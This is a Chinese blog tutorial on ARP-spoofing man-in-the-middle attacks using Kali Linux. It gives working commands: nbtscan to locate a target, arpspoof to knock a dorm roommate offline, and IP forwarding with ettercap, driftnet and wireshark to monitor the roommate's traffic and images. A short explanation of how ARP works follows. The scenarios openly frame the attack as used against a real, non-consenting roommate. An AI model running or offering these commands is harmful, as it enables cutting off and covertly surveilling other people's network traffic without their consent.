中间人攻击之ARP欺骗

0x00、软件安装及环境搭建

第一步、Kali下载导入

Kali下载地址(VMware版本):
https://images.kali.org/virtual-images/kali-linux-2020.4-vmware-amd64.7z
解压后,打开VMware,
图片.png
图片.png

第二步、Dsniff套件安装

Dsniff是一个基于unix系统网络嗅探工具。
Dsniff是一个工具集,主要分为四类:
1、纯粹被动地进行网络活动监视的工具,包括:dsniff、filesnarf、mailsnarf 、msgsnarf、urlsnarf、webspy;
2、针对SSH和SSL的MITM(Man-In-The-Middle)"攻击"工具,包括sshmitm和webmitm;
3、发起主动欺骗的工具,包括:arpspoof、dnsspoof、macof;
4、其它工具,包括tcpkill、tcpnice。
kali@kali:~#sudo apt-get update #更新软件列表
kali@kali:~# sudo apt-get install dsniff #从软件列表中下载安装dsniff
图片.png
测试是否安装成功
图片.png
我们发现其实运行这个软件和权限是息息相关的,我们切换root运行
图片.png
涉及到的软件都能够正常运行(本文仅仅涉及到arpspoof)
图片.png

0x01、场景一(让宿舍室友断网)

图片.png

第一步、找到室友的ip

NBTSCAN可以获取到PC的真实IP地址和MAC地址。
nbtscan -r 192.168.10.17/24
图片.png

第二步、让他断网

arpspoof -i 网卡 -t 目标IP 网关
arpspoof -i eth0 -t 192.168.8.213 192.168.8.1
图片.png
图片.png

0x02、场景二(监控室友网络)

第一步、开启ip转发功能(让他上网)

为使受害者主机的数据包能够顺利收发,我们需在Kali Linux中开启IP转发功能
A、开启:echo 1 > /proc/sys/net/ipv4/ip_forward;
图片.png

第二步、开启流量嗅探工具

driftnet 用于抓取网络流量中的图片,并将他们显示出来。ettercap是一个基于ARP地址欺骗方式的网络嗅探工具,主要适用于交换局域网络。
apt-get install driftnet //安装driftnet工具
ettercap -Tq -i eth0 //-T是仅使用文本GUI,-q不显示数据内容,-i是指定网卡
driftnet -i eth0 //选择监听端口为eth0
wireshark
图片.png
图片.png

0x03、场景三(实战案例介绍)

图片.png
图片.png
图片.png

0x04、原理分析

第一步、ARP请求

图片.png
图片.png

第二步、ARP响应

图片.png
图片.png
前提知识:
1、ARP是干啥的?
Arp是地址解析协议,通过ip获取mac地址的协议(同网段才能获取)
2、为啥要获取mac地址?
表面上我们看到的是通过ip进行通信,实际上局域网都是通过mac地址进行通信,

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值